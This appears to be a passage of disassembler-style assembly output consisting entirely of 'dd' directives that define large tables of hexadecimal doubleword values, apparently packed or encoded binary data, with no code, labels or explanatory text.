dd 5CDEAAB3h, 5247ABC9h, 6C10498Eh, 3C7BD1CBh, 875CACE5h
dd 15617777h, 75A797DDh, 545789B4h, 7425DEF5h, 9BACCED0h
dd 11CAFBB3h, 1F1EF079h, 9CA18DA2h, 3894DE52h, 0D2C32595h
dd 20795D6Bh, 9D763EF7h, 0CD716792h, 0CD361DDh, 70BB3952h
dd 9BE4E6DAh, 0EBCB1F6Bh, 0CBB9A75Eh, 459BD8CCh, 0D9198BABh
dd 0B9052DA8h, 466D9BB1h, 752F82CBh, 9A9215E5h, 77DA28A7h
dd 76E7035Ch, 7A6F2F3Fh, 6362DEC1h, 4936F4B4h, 0F0E99055h
dd 0E07D68C4h, 0A5367191h
dd 0AE97FF66h, 0C9CB8E8Ch, 5945F674h, 4EB5951Eh, 0F96B74C8h
dd 3C5302F8h, 0DCA5CAF7h, 20E5F7ECh, 31BEDAD1h, 1E6A62A5h
dd 6881CE2Eh, 2A2FA726h, 95298CF8h, 315AB7D0h, 0A8431975h
dd 4E8391AEh, 0EBCEF1F0h, 0CEE9C0F1h, 0C4E81322h, 6635C03Eh
dd 0D5DF7F87h, 0ECD168FBh, 7915467h, 4FF1ECEEh, 0BF56AFC6h
dd 6BDA6EECh, 7E9AEEA9h, 2B461CCFh, 0F4D7DF68h, 75FA7593h
dd 6E5F607Ch, 0A061177Ah, 8DD4E709h, 42A7A02Dh, 0CE755FC5h
dd 792B68ACh, 2FA538F0h, 0F5C231AFh, 6B2D032Ah, 93183137h
dd 48E48F87h, 0A3F9D426h, 75510A2Ch, 0B45BB550h, 88AD65B1h
dd 95D34159h, 0D5F2C7B2h, 92569E3Fh, 18A8E4A6h, 0BF746D3Eh
dd 0D85CF262h, 42EB4C4Ah, 0F3D659Dh, 0BF4ECB50h, 99AE514Fh
dd 0E39337DEh, 7B145FD5h, 8DF6595Fh, 6B6A58D4h, 213B1539h
dd 0C073C731h, 454E8FBh, 0D1815C81h, 280F6708h, 98ABEAC4h
dd 7CD4A452h, 55F695B5h, 88C0264Eh, 71EAED61h, 0F0D7F266h
dd 0A7BD90D8h, 567184F0h, 0C665E990h, 0ADE9DAAFh, 0CEEBC8D5h
dd 0BD6DA6ABh, 0F3F12C72h, 6CCA5FEEh, 0BA1F7556h, 0D3023C76h
dd 0BDE38DA9h, 5C4CCFF4h, 0EF60D929h, 6CAFBFF3h, 0CDFEF8DCh
dd 0FF5F05D6h, 0FC46C4BEh, 0A51E38F0h, 15DCC6BEh, 2DB94CA6h
dd 0C0747286h, 5CABDA32h, 3B253715h, 17881F25h, 0CBF3117Ch
dd 9C7B3DBBh, 56340308h, 0C0369728h, 4325A168h, 0CF1CCD3Ah
dd 0BC0AD127h, 0B6078A2Bh, 88F5D08Bh, 68509D69h, 316A3042h
dd 0B328C0FDh, 12E52DEh, 0F552B324h, 96142EFBh, 0EAC6AB3Ch
dd 5A176BA5h, 0AC4366D0h, 634438FEh, 553B1095h, 6315D9F2h
dd 11775BC1h, 96769C8Fh, 0DCF544D9h, 891DE8EBh, 689AC9F3h
dd 1A06D22Fh, 0FFB4DBCh, 2E6EAE48h, 92F0A370h, 0ACF3D71Bh
dd 20159A22h, 6DED37D0h, 0E05EFEF2h, 95CDDB83h, 0F1E6CEE8h
dd 0C178902h, 4B17557Ah, 0BA43F8B8h, 5769F250h, 7B0CC605h
dd 5B2490B9h, 6DAA9895h, 0AACCD510h, 76BA6FD9h, 0E6F2BF04h
dd 1A41F135h, 0CCCEBB45h, 4C2B2DBBh, 25C90974h, 381D076Ah
dd 65FC5124h, 445DFF9Ch, 0CAEF9745h, 36225F2h, 0EE1D07D7h
dd 169A60FEh, 0C17B7055h, 0E230AE4Ch, 0DD095745h, 3889101Fh
dd 0D79E9132h, 0BD5B8390h, 0DC2B49D9h, 0CDB541E0h, 0A089E999h
dd 0A29B2643h, 11B4AAC9h, 79B4A8BBh, 887EDD78h, 0EA688FE0h
dd 0DC23294Ah, 8F93D431h, 6BA84B44h, 0BC23ACB3h, 9AAE3647h
dd 495D778Fh, 4C0BF065h, 2431DBFCh, 716BF9A5h, 0ED3B74C7h
dd 1AA8A48Ah, 18A6F979h, 9BA6BAA3h, 9E2766AFh, 625D8247h
dd 0ECF8A9B9h, 69682A7Ah, 0BB8490A4h, 0BDAD92B0h, 6C72092Dh
dd 35332830h, 8BDDCD4Bh, 0F999B0A8h, 0A013E8F2h, 0D0FC7ADAh
dd 7ABD6AE1h, 8647575Fh, 34B2CFB5h, 7E1FCF71h, 55D9B798h
dd 0D2E2FB04h, 57F2AF97h, 0D4CCA0FBh, 0E01D2F47h, 2D757AE2h
dd 15C35DB3h, 0A33BD7D0h, 29D5E418h, 0C3700BAAh, 93D74BADh
dd 247D47BFh, 3377D18h, 87E3CFBDh, 0F06691B3h, 0AB8614Fh
dd 9B4799C9h, 0DFC24FA1h, 0B4C21363h, 3B46AE78h, 0AD9A17EBh
dd 0E3D3BB2Ah, 980C575Ah, 52A9CC0Dh, 0D7574145h, 3FBEAF13h
dd 0E37999C5h, 7A95682Eh, 0A432ED9Dh, 0BB471EFCh, 8262B6CEh
dd 772A49CDh, 4AF98CFDh, 1E1FB1E0h, 80B50BECh, 0CC57E9Fh
dd 22B237EAh, 0E27159C0h, 1A4D840Bh, 3A12B9C4h, 63B53EB2h
dd 7CCBB173h, 1629B0FCh, 0FAA3F2BFh, 3CFCF1C0h, 0FBAC770Ah
dd 0BFCBF2Ah, 0A35DF77Fh, 0F9F6B2F3h, 7554A048h, 0F34AFF4Ah
dd 0F7A667FCh, 46494439h, 7225564Bh, 9092D56Bh, 9B1F3257h
dd 0E08EAEABh, 0FB282EE6h, 0D6951832h, 0F159C731h, 462CC9B2h
dd 3C26396h, 7395AE6Bh, 5456FCDEh, 5C9194B5h, 39F72B49h
dd 858A085h, 9ACA15D1h, 7F9296C6h, 441611C2h, 0AE66F4A1h
dd 77D315A8h, 1E28BD9Ch, 71832435h, 0FAE57E22h, 833D5518h
dd 4D745750h, 0D565F0DCh, 0E2AE8BFDh, 6753D1Bh, 57F66DA9h
dd 577D1E02h, 0CC23109Ch, 0EB4E40F0h, 57CF65D8h, 42F44626h
dd 0BB9BC5BAh, 0E050E2A6h, 0C1AC32Eh, 3ECC8FB1h, 0F8C97DC3h
dd 0A056CEA1h, 703CA7C1h, 0DE1BECC5h, 43A5FEDDh, 63C3EAB4h
dd 5172BF4Ah, 5C17C060h, 3A29D5ECh, 2A2C18FAh, 0CCAD15D7h
dd 0C293FDDFh, 0F3BA3634h, 940D81F8h, 0CC6C9C9Ah, 3EACDEBDh
dd 0E71D89C7h, 8D559492h, 434BAFE6h, 5AB797B0h, 2AE3BB57h
dd 87706259h, 0B77B30E4h, 45D913Ah, 73AF45B2h, 37CBE7CFh
dd 0AF03EC45h, 0FA3C26B7h, 0F9FBD6C7h, 831C45A2h, 0A46EDEB2h
dd 0EDC564D8h, 32E2208Fh, 55055DDBh, 7BC0AC92h, 0B20ACBA5h
dd 0CAA6FE67h, 0F17EBCF1h, 38EEA0AFh, 0D7167936h, 0E862DB22h
dd 50D80B81h, 3B99EFBEh, 7F46F04Eh, 0CE2CB971h, 2687B2E3h
dd 0EB0E4BE1h, 2F7D432Ah, 0BEFE7707h, 53CBEAA5h, 0D520A81Ch
dd 2D964697h, 68A0FCA8h, 0E7565A65h, 265F485Bh, 0F5256A5Ah
dd 0BDFBE5E2h, 0B75FA73Eh, 0BE4250Ah, 0F39CD2AFh, 5020F399h
dd 0DFDF341Eh, 0B010D27Fh, 0D2C784BFh, 0B3D09768h, 6045C57Bh
dd 0CAFDE84Ah, 6C73DF9Bh, 2A04B122h, 75549BBFh, 4F12A1B9h
dd 0FC555C19h, 0BABFDCF1h, 84C5B46Ah, 0E44563B3h, 0E0F83856h
dd 495D4234h, 0CBA19A17h, 0D3AD0D94h, 0F577A553h, 98E3C1E3h
dd 16D69AB2h, 7C4B4D48h, 864D123Fh, 0ECA2A8A5h, 3ADF6BD3h
dd 9EB6824Fh, 0BFA73238h, 0D27DE3FAh, 0D34C5333h, 0BEDA15DAh
dd 130F959Dh, 0BCDCD619h, 912E147Fh, 977B1542h, 0A6E2F3DEh
dd 0BE55A75Bh, 52F235D8h, 914E6AD1h, 1B4A358Ah, 84B4243Fh
dd 0CF2D9A2Ch, 0E18C0D71h, 84CF6A89h, 3980E352h, 5F91374Ch
dd 4C858CE2h, 0A35ED457h, 0EE6540A5h, 895954ABh, 0B138C3FCh
dd 0CDCFFE2Eh, 0FA34DC0Ch, 2DFB78ACh, 0B98E1B7Ch, 0CBD03951h
dd 0AEF2480Ah, 0FA2BC543h, 0C9481C7Dh, 0CC81EE55h, 7837094Bh
dd 51511AC5h, 95F32CC4h, 0FB4F2619h, 792237E8h, 0B3B6870Eh
dd 0BE848ED9h, 0AE6F89DBh, 6AD40581h, 0A8B0AC32h, 0D1FFAF0Eh
dd 1BA8D069h, 0DDB7BC27h, 6181B162h, 0B23FAAD1h, 527FF3F3h
dd 8CE94406h, 0E589DEFFh, 0FB365AF4h, 0BB2AE8ABh, 0BC2B3113h
dd 56F26355h, 711DD58Dh, 0D297B2E8h, 57F0B151h, 0FC3F4334h
dd 0B412A958h, 680F2F56h, 59B9D4FDh, 498082CDh, 0C0C13F7Eh
dd 3BFDDED5h, 2EA07D84h, 0BBD34EA4h, 429E567Bh, 0D8E0F7ADh
dd 35AE57E5h, 0DE069754h, 5B59B731h, 0EF121326h, 3EAF2A7Ch
dd 0A59219ECh, 2A3603A0h, 4A35D26Ah, 94A2827Dh, 0ABCAEAB2h
dd 0E13C6CF0h, 0AF6826C3h, 0B77AA42Ah, 79D9BEDh, 0FC224AF6h
dd 4746E3B1h, 1BDE30FCh, 0A5DBEA0Ah, 0DC494C6Bh, 27E56364h
dd 5C3D27FFh, 0CB64A0A7h, 52A64FC4h, 306C374Ch, 8B6F24E3h
dd 0F0EA7951h, 0CEE42EB6h, 0AD751547h, 0A381E266h, 92D67725h
dd 5317B02h, 155B62Bh, 8A728A45h, 0BADAD0ADh, 86BEB1Fh
dd 0D71BEB3Eh, 194D2A67h, 0AEA375B0h, 9B03AEBAh, 8AAD7C9Ch
dd 0E129A1B9h, 0DEAA8E32h, 0BF365417h, 70B2EC25h, 0E3F8CF53h
dd 0E8BA6D6Ch, 670EFE3Ch, 0CA7A5698h, 0AD1F1F89h, 4F963175h
dd 0CAA86DC0h, 749277ABh, 0BBB5F4A4h, 7E15DC28h, 0C77B09CCh
dd 0AEC80DCFh, 0C9C85F63h, 50275AD5h, 83AAEAAAh, 0FB357ADBh
dd 197F97F5h, 0B4887919h, 7CD2192Dh, 43AE0C38h, 43F47B3Ah
dd 0C79A4C16h, 8BF8CB41h, 0AE376D29h, 0D7535244h, 2C552B46h
dd 2BEB6FFEh, 1C4ADEFFh
dd 6A201F31h, 5F6F301h, 6E1442FBh, 5B71814Eh, 9AD5B071h
dd 0DFB97948h, 0B933E4AEh, 34944C97h, 68BEA68Bh, 34618B23h
dd 0F72BC9A7h, 3BEF8F3h, 0B8FC55DAh, 2E3C956Dh, 937F2BD9h
dd 29F05E53h, 0CCDA8777h, 0F0BC954Ah, 4C0FD54Dh, 0F39D8153h
dd 6799EFC5h, 0E1866341h, 9B052939h, 0FA4654B3h, 0DA21BE3Eh
dd 0CF5711A9h, 1E050FC1h, 0AA7D73EAh, 819C4962h, 0A4C06997h
dd 0BFE1C379h, 109D41BBh, 9F7934B0h, 0CD59C6CEh, 0DA4A2345h
dd 0C9502722h, 0FB1AABDh, 0DDA2E8B4h, 0BD8068CCh, 0CA35EBDBh
dd 0A4BEE7A8h, 0AA22A32Dh, 0C1BCF355h, 4BFA8552h, 48FAA45Eh
dd 0C14AA5DEh, 384F781Eh, 77ACA97Bh, 0DDBD5E0Eh, 0A33DD4AAh
dd 71CCCF32h, 0DA0908B6h, 0B8CBAA8Fh, 0B9134A79h, 36B0AA86h
dd 0B9BCBBECh, 50A4FC17h, 0BA6EA425h, 3D8B00AEh, 0B76394EFh
dd 0DA7EEEABh, 6BE5561Dh, 48AC429Dh, 546E8550h, 2275F4F7h
dd 469D919Dh, 0FF77C1E0h, 0ACCFEEF6h, 185A961Eh, 0A8D71F86h
dd 74DB9883h, 3195CEBDh, 0BB958520h, 1F978206h, 0C8879A74h
dd 0D67D291h, 3F6F5F9Ah, 0D25AD090h, 75840835h, 7E2EABD3h
dd 4AA4FD6Bh, 0FF610FF1h, 0CAEFFA12h, 38C6268Fh, 69D84169h
dd 0DC1701Eh, 0E27F96C3h, 0E6DBE5C6h, 5840329Eh, 0AC70A855h
dd 7E777BCFh, 9CE55287h, 9C0911FDh, 99DF3176h, 0AEABAF2Fh
dd 515B1434h, 82A887C4h, 132AE097h, 87E2051Fh, 75D403BAh
dd 8B643F1Dh, 98F41553h, 4D3F6280h, 0AAEA9AB6h, 24E4F5C1h
dd 540A7830h, 0F85F93A8h, 891CD1D1h, 0F3C87355h, 0D941155Bh
dd 3E894C19h, 9BD7B81Ch, 97E17F15h, 314D75A1h, 7D766BA5h
dd 3F51EBF8h, 0B9333E1Dh, 8E61A81Dh, 0CD7AE7C2h, 89217145h
dd 0A5FBFEDEh, 8D7FA96Fh, 7F38426Fh, 5C2A8504h, 8E8F3EA0h
dd 0AF48D689h, 99D28B1Ah, 90D0D754h, 38FD1BE4h, 465698B0h
dd 7F54F8A6h, 0AF5A5C4Dh, 0A5FC816Ch, 0D402A9DDh, 2DD55245h
dd 23E0E9ACh, 83D5CC22h, 3D7EC193h, 0CE5AED10h, 1852D346h
dd 46526615h, 0D8A9914Ch, 0D7573165h, 55CAA73Fh, 0D374A33Eh
dd 219C78C1h, 0D2E09A77h, 5BE12DF5h, 0AB527912h, 995C85D7h
dd 30CB301Eh, 0B4DE8298h, 0AFF6D0AEh, 467D746Dh, 0E46F493Bh
dd 45E31F72h, 0DDBA51FBh, 0D520C52Ah, 3AA656A7h, 0FF76C89Bh
dd 0C3C0A698h, 3E2F7667h, 2530F3BFh, 3D6BA28Bh, 93D07019h
dd 0EB52EB63h, 76ACB1FBh, 7DD6B36h, 548AAEA7h, 0CAE41752h
dd 2D85F4EBh, 453EDD7Fh, 77C524B1h, 1B9516C6h, 0BD05CAC2h
dd 3C05EBBh, 0EFAECE5Eh, 0E3E6FB05h, 326A9F81h, 0B50F70B0h
dd 792CC29Ch, 9DD55C94h, 6D144BD1h, 0E730A554h, 603CD8CEh
dd 0A5FEF500h, 3A1DE4A3h, 0D76F3C92h, 0DA75B030h, 12C45683h
dd 0DA97DC5Dh, 0F8ADC701h, 0E6607A3Bh, 7CFFBEE1h, 0CEA05741h
dd 5C4A492Eh, 93691B90h, 14C4FE0Dh, 1780D79Fh, 0C6978243h
dd 0F85BA1E3h, 0CAA761E1h, 8B82E2FCh, 8E9AB2B1h, 0D5DED038h
dd 9DE06B4Ch, 3368506Ah, 2D3232BEh, 0E27A7E27h, 95577CA0h
dd 85EB5FB4h, 67F646F8h, 8BE47595h, 8C69A9F1h, 0CCF9556Ch
dd 86E280AAh, 0E216F0BEh, 0F253C4BAh, 597A4F9h, 45D1B3FFh
dd 15659EBCh, 5A15A6DCh, 0EFEB199Dh, 69FFE25Ah, 0C2B8B0DEh
dd 1FBED499h, 0F996F018h, 0DCDC3F11h, 6D1ABDA1h, 283F5ADAh
dd 5EDCC732h, 43F044F4h, 8ABBCEF2h, 0FD9219DBh, 0E3178978h
dd 38C717F9h, 0BCD24C4Bh, 75C7D984h, 0D0A7F158h, 2F07D0EAh
dd 3CA114CDh, 0C2D48CAEh, 0B51668B0h, 616DEB15h, 9F6456F1h
dd 845A19DEh, 8C01BAA0h, 5378B110h, 0A3317F85h, 0BF6A4AC2h
dd 0BB92C4B5h, 0DC099DA2h, 9287B0C1h, 0E3E08B36h, 0F960602Fh
dd 6EF36575h, 95B430F6h, 0E1498A8Eh, 9962E79Ch, 0DB8D68F3h
dd 3C23EF97h, 2B0A96D3h, 7AE8A32h, 0DF5F42FAh, 0E6846035h
dd 47B0F2ACh, 90C3F69Ah, 31A6B9Bh, 0CA9ABAF9h, 0A5680F1h
dd 0EC3BD1A8h, 50F8E13h, 9F79279Ah, 0ECE8C757h, 0A4EA3722h
dd 939F922Eh, 0AE8C2C5Fh, 5DA4CA6Dh, 0BBB3AF91h, 0C14E866Ch
dd 0ABBF9A12h, 2D14FF1h, 0A7C0B8DEh, 0F0436D2Ch, 0CA98878Dh
dd 0FDC6C303h, 0CEAA68F5h, 8793250Dh, 1BAAA6EFh, 0F55D643Ch
dd 9160D9FFh, 15358B22h, 0F39DA4C4h, 0D5BDC6FCh, 7452FCC4h
dd 7CC80A81h, 8C5A4B88h, 30FC1B5Bh, 7D6647B4h, 0E4DA0EF1h
dd 12E5B293h, 0D9AB0335h, 0DBB9CF48h, 3212A951h, 0A2B502A8h
dd 0C4EDAFC7h, 0EF3323DFh, 5E6D136Bh, 0E54228A2h, 52987C7Dh
dd 0B49722D6h, 0A15DBB2Fh, 9558913h, 9AF78DDEh, 0EFB8F0FEh
dd 456CA0A4h, 0D4CEAD2Fh, 0C674CE00h, 81BF9D0Fh, 0B13DAB40h
dd 0B7BC96Ch, 34439FBFh, 0DDAABC7Fh, 9087FD53h, 5005F355h
dd 40657C5Bh, 0DF4F79FCh, 8CE3DC35h, 0DF0F5E88h, 1EFEB3B6h
dd 124E31CCh, 97A6A8B1h, 0D1509BD7h, 3E230205h, 0F1CBA54Fh
dd 0F6718768h, 0A6FB7F9h, 914E84Eh, 0B52AB179h, 8B1BEA22h
dd 0CAEEF2BBh, 72422C75h, 0A0D95324h, 0FE51673Fh, 0D900F9D7h
dd 0CB8C2760h, 2AD655DDh, 0F31C8DD8h, 7BB88EFEh, 7325B0AEh
dd 0AFC38667h, 0D1D5BAFBh, 0E95A64ECh, 9DF3AABCh, 0B53DAE8Ch
dd 0BEA4C5DDh, 290692FCh, 6A8D8AD9h, 396E0906h, 7E948052h
dd 6DE3B7A1h, 5F916A47h, 0EC40F53Ch, 388771C4h, 1EB3A68Fh
dd 0EF04E1B9h, 0CB460ABDh, 3BF7AA75h, 213C167Fh, 76EC3A09h
dd 0F5539EAFh, 138D7292h, 0FCA57B3Eh, 743CD4Ah, 0A16C3B46h
dd 0DE1FE50Dh, 0B9CEF4Ch, 0EDDD7C1Eh, 2F89CE41h, 0ABC26E78h
dd 0F9A4B1FAh, 171D8123h, 0AF01EFC7h, 925AC694h, 5F3893C7h
dd 0C02926E3h, 4AD1E534h, 27CBE35h, 81F213FBh, 52AFDA39h
dd 6DB4F62Ch, 0C3B8617Eh, 99F2CEA7h, 64135C9Dh, 8575564Fh
dd 0C28986A4h, 0B345E92Ah, 0F1CADCD8h, 88437238h, 0C90F5C19h
dd 2996CB09h, 0DB13C702h, 1FFCA3AFh, 0B58767C9h, 69D9D833h
dd 3E3F900Ah, 0E0AE5DCDh, 0EADC987h, 0A7457B33h, 0D663C4E6h
dd 0D505B899h, 722B3035h, 7EE336EDh, 0A697F81Fh, 0EA920930h
dd 0DCBAE3DEh, 0B4325C57h, 0E370E85Ch, 3C3C3B0Bh, 8B577970h
dd 3FD2661Fh, 0ED5945FDh, 235F7B1Bh, 35163583h, 0E340774Dh
dd 6DEF5D5Ah, 14CA71BCh, 0E0C9564h, 3CC5AD73h, 0C118B566h
dd 758A3999h, 4B5034A3h, 18D2128h, 75DF65FFh, 9B832D16h
dd 208C851Ah, 0DBC57161h, 0D0106612h, 18068F56h, 4E2BD3Fh
dd 4C23348Dh, 0F8425F16h, 4DD7285Fh, 45D6EE06h, 0A453CEB9h
dd 73D7151h, 83C7734Fh, 8C5184E3h, 7E7383B1h, 512B999h
dd 0FFA9BE4Fh, 27745D60h, 0DAFDEA0Eh, 5C7C4A72h, 6A4DE2D9h
dd 2D6A7486h, 654F2E72h, 0E6A15864h, 0FE902D3h, 0A145F8E8h
dd 2045EE0Ah, 7EFCF0B9h, 6469F95Ah, 5C2F2758h, 0A850CD28h
dd 37DE3D76h, 0A158CDFAh, 6B026424h, 0AAE8D774h, 3B8B59FCh
dd 34E156B6h, 94ED74F3h, 716A6169h, 4AA9E17Eh, 7E554DCFh
dd 9EBB8215h, 0E1BA41D7h, 0FCDADC7h, 34F6B89Ch, 6759D9D4h
dd 0C840E4DFh, 1F77280Fh, 97A575Fh, 0F0AF25F0h, 3CF7B76h
dd 0F2F5C4AFh, 2D922B1Fh, 60BF598Ah, 0B5A4FDB6h, 22719F07h
dd 7D587081h, 0E66820D8h, 945BC826h, 0ADDCEEC3h, 2583F968h
dd 9F94A3FDh, 0FE30D31Fh, 4BB4ECD9h, 0E04CF9BAh, 0CCF31173h
dd 0C2314B9Eh, 63DC1817h, 608AF6A5h, 0E587006h, 0A3723BAFh
dd 5B4DCC11h, 0B29FE42h, 5EA3C2EAh, 67E655A9h, 0B902AA4Dh
dd 79A9639Eh, 5086CE2Dh
dd 0C7A938B4h, 4B032B03h, 0E82A95A4h, 360FC297h, 90AFD576h
dd 0B7DBC462h, 0ADB39430h, 0C2955DB7h, 55C3D869h, 6EA09DAAh
dd 0E38CE6DCh, 0BDC8D5E8h, 0DFB96E2Ah, 0CCBA7040h, 583339D1h
dd 0A5964A17h, 1B9F0EFCh, 0A62F12FEh, 0ED2BC26Bh, 4523C9EBh
dd 2529D8Bh, 0BECB7ED7h, 808C6771h, 0E3371567h, 777A5A16h
dd 0E8A5B0Eh, 0FB5A45F7h, 0ACE12D2Ch, 6EAF366Fh, 0C476A4AFh
dd 47B94436h, 86B6B354h, 172A496Bh, 0AA2EC914h, 9BE29DA3h
dd 0A0449D97h, 0CA68CB4Ah, 0B5E150EDh, 0F8FBEE89h, 1705A7C8h
dd 69BBBD46h, 2C4CBC58h, 846FBC1Fh, 7DACA1AFh, 0CEAF3184h
dd 28CAD45Fh, 0C87E94C0h, 0BC65EE76h, 0C2AB36E9h, 2FEC4965h
dd 91EADA7Dh, 0B62B9936h, 0E6223AC3h, 64D74EBAh, 0EA252BFAh
dd 86B2E2A6h, 6C74E9A1h, 3F11B85Dh, 1C44FECh, 0FAB976D6h
dd 0E8892DB5h, 0D1D6366Ch, 65BAC572h, 6C5F6A88h, 8295F6B9h
dd 95C2CB10h, 0F87FB62Bh, 0C87E455Fh, 34754A61h, 0A7203779h
dd 0D7610C03h, 661DBDE9h, 59F14CDh, 5D7AC251h, 0F6C0FD0Eh
dd 145CFD2Ah, 350515F3h, 24F1D83Bh, 1B8DAADAh, 2BB5D644h
dd 124A12ADh, 0F2733C91h, 35D26A53h, 67066ED7h, 0CA5C55F4h
dd 18187547h, 524E1E09h, 0A568C719h, 3E649EE6h, 5320D4F2h
dd 0F83EDF8Dh, 162F4EFAh, 54545EB9h, 0BB8FB1Bh, 0A3F58DDEh
dd 0C115719Fh, 323978A3h, 7E3BC301h, 1A86B551h, 0D2DDB64Fh
dd 4543911Bh, 0D6DDB408h, 0B4252254h, 0C151CB7Dh, 632D950Eh
dd 0B69BCF51h, 0BA30B476h, 0DA0DCCEBh, 1CC7A2F1h, 360C6506h
dd 0BBE41B4Dh, 0E90461A6h, 55EB92E9h, 0E2BBA820h, 0DD2CD62h
dd 6DE30D75h, 5864AD48h, 0C2FFFC89h, 0B3AFF8C6h, 59CD0D38h
dd 5F3CD9B1h, 6B5A8BFh, 61705CA6h, 0EB38FD6Ah, 0E8A8FC06h
dd 6EA8EB52h, 24AD8E55h, 0ABA77248h, 29B0C4A5h, 0D966A3CEh
dd 0B5545FB7h, 0DACC4FC6h, 97F6004Bh, 0B99DF34Ah, 0A0BA7C92h
dd 7D8F64B9h, 0FC5FB375h, 4C5CF6F6h, 6DAA239Bh, 995550Ah
dd 98D10A58h, 54F736BBh, 0FB1D81E4h, 655DF14Bh, 84CDE557h
dd 6406B901h, 668F9162h, 0CE3D117Ah, 2A7CE2ABh, 26EFEDDh
dd 0F5B26457h, 6DB65524h, 3D0B6678h, 70BD1CAFh, 0DE4D8766h
dd 35ECEE5Fh, 28C45560h, 60B32D52h, 3793D36Ch, 0AD93B5FFh
dd 0D68F50D5h, 0C960F6C0h, 0E863687Fh, 93A298A5h, 0BBCD9AE7h
dd 0BD75239Eh, 58BF8BFAh, 4FD85D7Ch, 707CEA1Fh, 75D35D7h
dd 8ED5CBAAh, 84E37CACh, 0D6FFD2D1h, 1360B1B2h, 4CF2DB97h
dd 957B73B8h, 6356B238h, 16C34473h, 57AF5D67h, 0ABDF314Eh
dd 1D9E724Dh, 0C09F964Ah, 247D1698h, 0EB94D388h, 0C5A5EECBh
dd 99539F42h, 9AB1CA0Bh, 889C3F2Ah, 0DCC2BB46h, 0C21974E2h
dd 0F3104415h, 893217DEh, 5D712522h, 4AF9FC60h, 0A6DDE749h
dd 99CF6A54h, 0D12FEFE4h, 1B53A9A7h, 6A0CC675h, 58AFB277h
dd 0FF9B945Eh, 0B44D69D2h, 2D51E956h, 10746E72h, 0B12685DDh
dd 0F8D3E772h, 9BBC7625h, 78D1C81Ch, 0EE151137h, 0C9ADF8F9h
dd 0B427AB37h, 1F72A981h, 0F1A0AE3Eh, 4FD4C337h, 0A535DA28h
dd 23454B61h, 9DC6558h, 0CDBD7737h, 96EF700Fh, 0D1748942h
dd 8AA96D69h, 7A6E6AACh, 0BB4F07DCh, 8BDD260Eh, 96E37FBh
dd 0B4315FDBh, 0C2FD7ED0h, 9A4FC67Eh, 66EF61F8h, 3C5CCDA6h
dd 0B6E24477h, 85D8D762h, 0DAB3812Dh, 3446666h, 0E5FE2A77h
dd 2DA2AA3Bh, 0B16E9B6Bh, 0CEC46131h, 0DF2F5EAEh, 0E1687EBDh
dd 465AF1DAh, 2E895E1Bh, 0F018E6EFh, 3B60AFFBh, 158DDA35h
dd 402A2DA7h, 509BFC9Ah, 0C4F03AB6h, 0B134F69h, 0A8DDAD1Fh
dd 4DA64CEDh, 0CB66B140h, 0EC1A6BDFh, 0C1049F7Ch, 948D24CCh
dd 3F2A7725h, 512F7270h, 0C450DFBFh, 0D4CB63ECh, 0EE77993h
dd 0F8D07D99h, 2604D07Eh, 0BEFD8E1Eh, 0EDA9C951h, 4328C12Fh
dd 0A353D235h, 6633E0FAh, 0AA99B5CAh, 36197AAFh, 12422A65h
dd 0E598EAC0h, 180F8D7Bh, 0A906AF0Ch, 3CD23C71h, 2531599Dh
dd 0ABE3E8B7h, 0DE33DC4Bh, 4CC46560h, 855ACC09h, 1EE4DE55h
dd 0A3281B6Ch, 0C143FFAEh, 413ABAEEh, 0F6559E76h, 15284CFBh
dd 22ABBC25h, 8532959Dh, 0D68388A9h, 2D6B51Eh, 0E3ABF93Fh
dd 527E41FEh, 55C0D7B0h, 0EB590D31h, 2E24C699h, 0FD605A4Eh
dd 0CB58CACAh, 592FA137h, 0BEB66189h, 4EAEC1EDh, 19B44DB3h
dd 860E7C0Dh, 78F182ECh, 8A2BC8A9h, 36A92AF7h, 1389B8C4h
dd 2E8E5C33h, 594CEF7Fh, 7D7A99DCh, 26546A4Ch, 252BB069h
dd 21FCF3Ah, 3690E5B3h, 0AD69A9E6h, 9AC9B5DEh, 8949975h
dd 766E7E71h, 84E10E6Bh, 3B145E25h, 6D123BC5h, 0EED8CDD4h
dd 0AB18D3BAh, 7E8D28EEh, 17F01E0Dh, 333C4BF6h, 7F67F236h
dd 80240082h, 1AAEDABDh, 34A55B7h, 75177A87h, 0D82BCB35h
dd 5FB477F1h, 541636B7h, 0ACB706E8h, 937AE189h, 2B41425Fh
dd 0F9E0CEF3h, 961CB138h, 9277E50Eh, 0A9517B63h, 0F748AFA2h
dd 56B439DDh, 0AB81694Bh, 0FCDC0F58h, 5995A378h, 75821A27h
dd 0EED03377h, 0FBE62612h, 0F82B4547h, 0DFB7C6BAh, 0FC1ED515h
dd 58CC33B2h, 0DEA2A59Fh, 0EA7BA58h, 6E7E2F87h, 170468DCh
dd 8346F6D1h, 0CBCD5BECh, 179BBCD9h, 0D025F252h, 0CE08F657h
dd 295F179Ch, 0AB70DB24h, 31B43EDBh, 40BCB541h, 29A45F85h
dd 39601D5Dh, 0E7167F85h, 45A4F2A5h, 0A9D86443h, 73C9B6EAh
dd 0D46362FBh, 782FC081h, 0FDCDFE45h, 798B4085h, 0C6B1E1E7h
dd 78E2C298h, 19CD4CFAh, 0C4ADCC6Ah, 0FE3177Eh, 70EED1A4h
dd 557B56B4h, 0E14A58DFh, 276403C6h, 0BA8A781Ah, 0D035122Ah
dd 12AC22Ah, 0C809E463h, 0F438046h, 0D718C102h, 25603066h
dd 0E2B04542h, 0AD20F4B4h, 0E1AF6A93h, 0E48D255Fh, 1976ADF9h
dd 468393EBh, 0A266A46Fh, 5A6F4D79h, 0F9CE5C8Dh, 12D26D75h
dd 0BBF01D7Eh, 1E3C1BCAh, 91EE2BF8h, 0AE67F735h, 5EF6F04Bh
dd 0A99F1469h, 34A84F15h, 3C3AF456h, 0CE2CF46Ch, 5FAD106Fh
dd 98D482Ah, 0DF5F8491h, 5FF0B6C3h, 0AF7D644Ah, 5F8AA3ECh
dd 551B8E9Ah, 777B0B5Fh, 3BBD1194h, 9DBB7909h, 0E9A8C304h
dd 0C1A39478h, 2CDEABB7h, 53842F50h, 8CA36383h, 0A98BBF25h
dd 5484BF3Ah, 0A524E6D7h, 453AD9DDh, 0ADAB0518h, 71331F85h
dd 0A2CA8AE2h, 0A7920BC2h, 0EEA7AD6Dh, 5999AAE8h, 275ECA17h
dd 92E3AEA9h, 3F432CFDh, 25D3A754h, 2E6A5CADh, 0BF42C129h
dd 552A7915h, 3BE0A07Dh, 0B68D6A05h, 7ADFF021h, 0F03ECBF6h
dd 11AE7A23h, 5D939C3Dh, 0BD711769h, 4707589Bh, 0FCCF149h
dd 7B279114h, 87981F4Bh, 87BE859Ah, 55799BDFh, 0F31B43C9h
